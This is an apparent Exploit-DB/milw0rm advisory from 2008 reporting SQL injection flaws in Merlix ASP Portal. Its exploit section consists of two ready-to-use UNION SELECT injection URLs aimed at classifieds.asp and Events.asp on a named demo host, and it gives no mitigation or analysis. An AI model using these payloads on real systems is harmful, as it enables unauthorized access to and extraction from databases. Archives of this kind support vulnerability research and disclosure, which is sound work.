ASP Portal - Multiple SQL Injections

EDB-ID:

7357


Author:

AlpHaNiX

Type:

webapps


Platform:

ASP

Date:

2008-12-05


###########################################################################
#---------------------------------------------------OffensiveTrack--------------------------------------------------------#
###########################################################################

---------------------------- Tunisian Muslim ------------------------------

#found by : OffensiveTrack
#Author   : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : Merlix ASP PORTAL
#download : null
#Demo     : http://demo.merlix.com/portal/


#Exploit :
--=[SQL INJECTION]=--
http://demo.merlix.com/portal/classifieds.asp?ItemID=-0+union+select+1,2,3,4,5,6,7,8,9,10+from+Directory
http://demo.merlix.com/portal/Events.asp?ID=-0+union+select+1,2,3,4,5,6,7,8+from+Directory



#Greetz For Synex

###########################################################################

# milw0rm.com [2008-12-05]